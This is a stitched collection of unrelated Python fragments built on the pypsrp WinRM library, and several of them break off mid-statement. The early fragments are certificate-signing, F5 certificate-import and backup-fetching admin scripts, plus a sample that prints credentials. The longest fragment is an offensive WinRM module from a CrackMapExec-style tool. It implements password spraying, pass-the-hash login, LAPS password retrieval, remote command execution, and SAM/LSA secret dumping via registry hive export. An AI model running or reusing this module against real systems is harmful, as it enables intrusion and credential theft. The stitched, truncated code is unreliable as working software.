import pypsrp from pypsrp.client import Client if True: # set global variables now = datetime.datetime.now() month = '{:02d}'.format(now.month) day = '{:02d}'.format(now.day) device_hostname = '''+DEVICE HOSTNAME HERE+''' user = r'''+MS CA USERNAME WITH DOMAIN HERE+''' pwd = '''+MS CA PASSWORD HERE+''' ca = '''+MS CA IP OR RESOLVABLE HOSTNAME HERE+''' date_format = f'{now.year}{month}{day}' csrname = f'{device_hostname}_{now.year}{month}{day}.txt' ca_drive = r'''+PATH TO DRIVE WHERE CERTIFICATES ARE MANAGED ON MS CA HERE+''' submit_command = 'certreq.exe -submit -config -' certname = f'{now.year}{month}{day}.cer' if True: # set pypsrp client connection settings to CA ca_client = Client(f"{ca}", username=f"{user}", password=pwd, cert_validation=False, ssl=False) if True: # copy csr to CA with pypsrp client # !!!applicable csr must be present in directory where this is run!!! ca_client.copy(csrname, f"{ca_drive}\\{csrname}") if True: # 'submit'/sign csr on CA with pypsrp client ca_client.execute_cmd( f'{submit_command} {ca_drive}\\{csrname} {ca_drive}\\{certname}') if True: # fetch cert from CA # !!!will put certificate in directory where this is run!!! ca_client.fetch(f"{ca_drive}\\{certname}", certname)
username=f"{ca_domain}\\{ca_un}", password=ca_pwd, cert_validation=False, ssl=False) if True: # copy local csr file to CA with pypsrp client print("Copying local CSR file to CA...") ca_client.copy(csrname, f"{cert_drive}\\{csrname}") if True: # 'submit'/sign csr on CA with pypsrp client print("Signing CSR on CA...") ca_client.execute_cmd( f'certreq.exe -submit -config - {cert_drive}\\{csrname} {cert_drive}\\{certname}' ) if True: # fetch cert file from CA and store as new name locally print("Fetching new signed certificate from CA...") new_certname = f'{cn_short}_{date_format}.crt' ca_client.fetch(f"{cert_drive}\\{certname}", new_certname) if True: # read cert file to variable ## uncomment to test without CA #new_certname = f'{cn_short}_{date_format}.crt' with open(new_certname, 'r+') as cert_import: cert_lines = cert_import.readlines() if True: # import new certificate to device print("Importing new certificate to device...") for line in cert_lines: line = str(line).rstrip() connect_ssh( f'echo "{line}" >> /config/httpd/conf/ssl.crt/{new_certname}', False) time.sleep(.5) if True: # apply new certificate as host certificate print("Moving to tmos and applying certificate...")
import os from pypsrp.client import Client username = os.environ["ANSIBLE_WIN_USER"] password = os.environ["ANSIBLE_WIN_PASSWORD"] print(username) print(password) # this takes in the same kwargs as the WSMan object client = Client("localhost", port=5985, ssl=False, cert_validation=False, username=username, password=password) # execute a cmd command stdout, stderr, rc = client.execute_cmd("dir") print(stdout) stdout, stderr, rc = client.execute_cmd("powershell.exe gci $pwd") print(stderr) exit() sanitised_stderr = client.sanitise_clixml(stderr) # execute a PowerShell script output, streams, had_errors = client.execute_ps('''$path = "%s" if (Test-Path -Path $path) { Remove-Item -Path $path -Force -Recurse } New-Item -Path $path -ItemType Directory''' % path) output, streams, had_errors = client.execute_ps("New-Item -Path C:\\temp\\folder -ItemType Directory") # copy a file from the local host to the remote host client.copy("~/file.txt", "C:\\temp\\file.txt") # fetch a file from the remote host to the local host client.fetch("C:\\temp\\file.txt", "~/file.txt")
if True: # Get list of backup files from backup server file_out = backup_server_client.execute_cmd(f'dir "{backup_drive}"') filelist = file_out[0] filelist = filelist.strip() files = filelist.splitlines() for val in files: val_list = val.split() for v in val_list: if 'F5' in v and 'txt' in v: f_split = v.split('\\') filename = str(f_split[0]) device_files.append(filename) if True: # Fetch backup files from backup server for f in device_files: backup_server_client.fetch(f'{backup_drive}\\{f}', f) command = subprocess.Popen(f'mv {f} config_files/{f}', stdout=subprocess.PIPE, shell=True) run = command.communicate() if True: # Generate applicable local device file list command = subprocess.Popen('ls config_files/', stdout=subprocess.PIPE, shell=True) run = command.communicate() for v in run: if type(v) == bytes: local_dev_files.append(v.decode()) for v in local_dev_files: local_file_list = v.split()
class winrm(connection): def __init__(self, args, db, host): self.domain = None self.server_os = None self.output_filename = None connection.__init__(self, args, db, host) @staticmethod def proto_args(parser, std_parser, module_parser): winrm_parser = parser.add_parser('winrm', help="own stuff using WINRM", parents=[std_parser, module_parser]) winrm_parser.add_argument( "-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes') winrm_parser.add_argument( "--no-bruteforce", action='store_true', help= 'No spray when using file for username and password (user1 => password1, user2 => password2' ) winrm_parser.add_argument( "--continue-on-success", action='store_true', help="continues authentication attempts even after successes") winrm_parser.add_argument("--port", type=int, default=0, help="Custom WinRM port") winrm_parser.add_argument("--ssl", action='store_true', help="Connect to SSL Enabled WINRM") winrm_parser.add_argument("--ignore-ssl-cert", action='store_true', help="Ignore Certificate Verification") winrm_parser.add_argument("--laps", dest='laps', metavar="LAPS", type=str, help="LAPS authentification", nargs='?', const='administrator') dgroup = winrm_parser.add_mutually_exclusive_group() dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to") dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target') cgroup = winrm_parser.add_argument_group( "Credential Gathering", "Options for gathering credentials") cegroup = cgroup.add_mutually_exclusive_group() cegroup.add_argument("--sam", action='store_true', help='dump SAM hashes from target systems') cegroup.add_argument("--lsa", action='store_true', help='dump LSA secrets from target systems') cgroup = winrm_parser.add_argument_group( "Command Execution", "Options for executing commands") cgroup.add_argument('--no-output', action='store_true', help='do not retrieve command output') cgroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command") cgroup.add_argument("-X", metavar="PS_COMMAND", dest='ps_execute', help='execute the specified PowerShell command') return parser def proto_flow(self): self.proto_logger() if self.create_conn_obj(): self.enum_host_info() if self.print_host_info(): if self.login(): if hasattr(self.args, 'module') and self.args.module: self.call_modules() else: self.call_cmd_args() def proto_logger(self): self.logger = CMEAdapter( extra={ 'protocol': 'SMB', 'host': self.host, 'port': 'NONE', 'hostname': 'NONE' }) def enum_host_info(self): # smb no open, specify the domain if self.args.domain: self.domain = self.args.domain self.logger.extra['hostname'] = self.hostname else: try: smb_conn = SMBConnection(self.host, self.host, None) try: smb_conn.login('', '') except SessionError as e: pass self.domain = smb_conn.getServerDNSDomainName() self.hostname = smb_conn.getServerName() self.server_os = smb_conn.getServerOS() self.logger.extra['hostname'] = self.hostname self.output_filename = os.path.expanduser( '~/.cme/logs/{}_{}_{}'.format( self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))) try: smb_conn.logoff() except: pass except Exception as e: logging.debug( "Error retrieving host domain: {} specify one manually with the '-d' flag" .format(e)) if self.args.domain: self.domain = self.args.domain if self.args.local_auth: self.domain = self.hostname def laps_search(self, username, password, ntlm_hash, domain): ldapco = LDAPConnect(self.domain, "389", self.domain) connection = ldapco.plaintext_login(domain, username[0] if username else '', password[0] if password else '', ntlm_hash[0] if ntlm_hash else '') if connection == False: logging.debug( 'LAPS connection failed with account {}'.format(username)) return False searchFilter = '(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(name=' + self.hostname + '))' attributes = ['ms-MCS-AdmPwd', 'samAccountname'] result = connection.search(searchFilter=searchFilter, attributes=attributes, sizeLimit=0) msMCSAdmPwd = '' sAMAccountName = '' for item in result: if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue for computer in item['attributes']: if str(computer['type']) == "sAMAccountName": sAMAccountName = str(computer['vals'][0]) else: msMCSAdmPwd = str(computer['vals'][0]) logging.debug("Computer: {:<20} Password: {} {}".format( sAMAccountName, msMCSAdmPwd, self.hostname)) self.username = self.args.laps self.password = msMCSAdmPwd if msMCSAdmPwd == '': logging.debug( 'msMCSAdmPwd is empty, account cannot read LAPS property for {}' .format(self.hostname)) return False if ntlm_hash: hash_ntlm = hashlib.new('md4', msMCSAdmPwd.encode('utf-16le')).digest() self.hash = binascii.hexlify(hash_ntlm).decode() self.domain = self.hostname return True def print_host_info(self): if self.args.domain: self.logger.extra['protocol'] = "HTTP" self.logger.info(self.endpoint) else: self.logger.extra['protocol'] = "SMB" self.logger.info(u"{} (name:{}) (domain:{})".format( self.server_os, self.hostname, self.domain)) self.logger.extra['protocol'] = "HTTP" self.logger.info(self.endpoint) self.logger.extra['protocol'] = "WINRM" if self.args.laps: return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain) return True def create_conn_obj(self): endpoints = [ 'https://{}:{}/wsman'.format( self.host, self.args.port if self.args.port else 5986), 'http://{}:{}/wsman'.format( self.host, self.args.port if self.args.port else 5985) ] for url in endpoints: try: requests.get(url, verify=False, timeout=3) self.endpoint = url if self.endpoint.startswith('https://'): self.port = self.args.port if self.args.port else 5986 else: self.port = self.args.port if self.args.port else 5985 self.logger.extra['port'] = self.port return True except Exception as e: if 'Max retries exceeded with url' not in str(e): logging.debug('Error in WinRM create_conn_obj:' + str(e)) return False def plaintext_login(self, domain, username, password): try: from urllib3.connectionpool import log log.addFilter(SuppressFilter()) if not self.args.laps: self.password = password self.username = username self.domain = domain if self.args.ssl and self.args.ignore_ssl_cert: self.conn = Client(self.host, auth='ntlm', username=u'{}\\{}'.format( domain, self.username), password=self.password, ssl=True, cert_validation=False) elif self.args.ssl: self.conn = Client(self.host, auth='ntlm', username=u'{}\\{}'.format( domain, self.username), password=self.password, ssl=True) else: self.conn = Client(self.host, auth='ntlm', username=u'{}\\{}'.format( domain, self.username), password=self.password, ssl=False) # TO DO: right now we're just running the hostname command to make the winrm library auth to the server # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True self.logger.success(u'{}\\{}:{} {}'.format( self.domain, self.username, self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8, highlight('({})'.format(self.config.get('CME', 'pwn3d_label') ) if self.admin_privs else ''))) if not self.args.local_auth: add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except Exception as e: if "with ntlm" in str(e): self.logger.error(u'{}\\{}:{}'.format( self.domain, self.username, self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)) else: self.logger.error(u'{}\\{}:{} "{}"'.format( self.domain, self.username, self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8, e)) return False def hash_login(self, domain, username, ntlm_hash): try: from urllib3.connectionpool import log log.addFilter(SuppressFilter()) lmhash = '00000000000000000000000000000000:' nthash = '' if not self.args.laps: self.username = username #This checks to see if we didn't provide the LM Hash if ntlm_hash.find(':') != -1: lmhash, nthash = ntlm_hash.split(':') else: nthash = ntlm_hash ntlm_hash = lmhash + nthash if lmhash: self.lmhash = lmhash if nthash: self.nthash = nthash else: nthash = self.hash self.domain = domain if self.args.ssl and self.args.ignore_ssl_cert: self.conn = Client(self.host, auth='ntlm', username=u'{}\\{}'.format( self.domain, self.username), password=lmhash + nthash, ssl=True, cert_validation=False) elif self.args.ssl: self.conn = Client(self.host, auth='ntlm', username=u'{}\\{}'.format( self.domain, self.username), password=lmhash + nthash, ssl=True) else: self.conn = Client(self.host, auth='ntlm', username=u'{}\\{}'.format( self.domain, self.username), password=lmhash + nthash, ssl=False) # TO DO: right now we're just running the hostname command to make the winrm library auth to the server # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True self.logger.success(u'{}\\{}:{} {}'.format( self.domain, self.username, nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8, highlight('({})'.format(self.config.get('CME', 'pwn3d_label') ) if self.admin_privs else ''))) if not self.args.local_auth: add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except Exception as e: if "with ntlm" in str(e): self.logger.error(u'{}\\{}:{}'.format( self.domain, self.username, nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)) else: self.logger.error(u'{}\\{}:{} "{}"'.format( self.domain, self.username, nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8, e)) return False def execute(self, payload=None, get_output=False): try: r = self.conn.execute_cmd(self.args.execute) except: self.logger.debug( 'Cannot execute cmd command, probably because user is not local admin, but powershell command should be ok !' ) r = self.conn.execute_ps(self.args.execute) self.logger.success('Executed command') self.logger.highlight(r[0]) def ps_execute(self, payload=None, get_output=False): r = self.conn.execute_ps(self.args.ps_execute) self.logger.success('Executed command') self.logger.highlight(r[0]) def sam(self): self.conn.execute_cmd( "reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM" ) self.conn.fetch("C:\\windows\\temp\\SAM", self.output_filename + ".sam") self.conn.fetch("C:\\windows\\temp\\SYSTEM", self.output_filename + ".system") self.conn.execute_cmd( "del C:\\windows\\temp\\SAM && del C:\\windows\\temp\\SYSTEM") localOperations = LocalOperations(self.output_filename + ".system") bootKey = localOperations.getBootKey() SAM = SAMHashes( self.output_filename + ".sam", bootKey, isRemote=None, perSecretCallback=lambda secret: self.logger.highlight(secret)) SAM.dump() SAM.export(self.output_filename + ".sam") def lsa(self): self.conn.execute_cmd( "reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM" ) self.conn.fetch("C:\\windows\\temp\\SECURITY", self.output_filename + ".security") self.conn.fetch("C:\\windows\\temp\\SYSTEM", self.output_filename + ".system") self.conn.execute_cmd( "del C:\\windows\\temp\\SYSTEM && del C:\\windows\\temp\\SECURITY") localOperations = LocalOperations(self.output_filename + ".system") bootKey = localOperations.getBootKey() LSA = LSASecrets(self.output_filename + ".security", bootKey, None, isRemote=None, perSecretCallback=lambda secretType, secret: self. logger.highlight(secret)) LSA.dumpCachedHashes() LSA.dumpSecrets()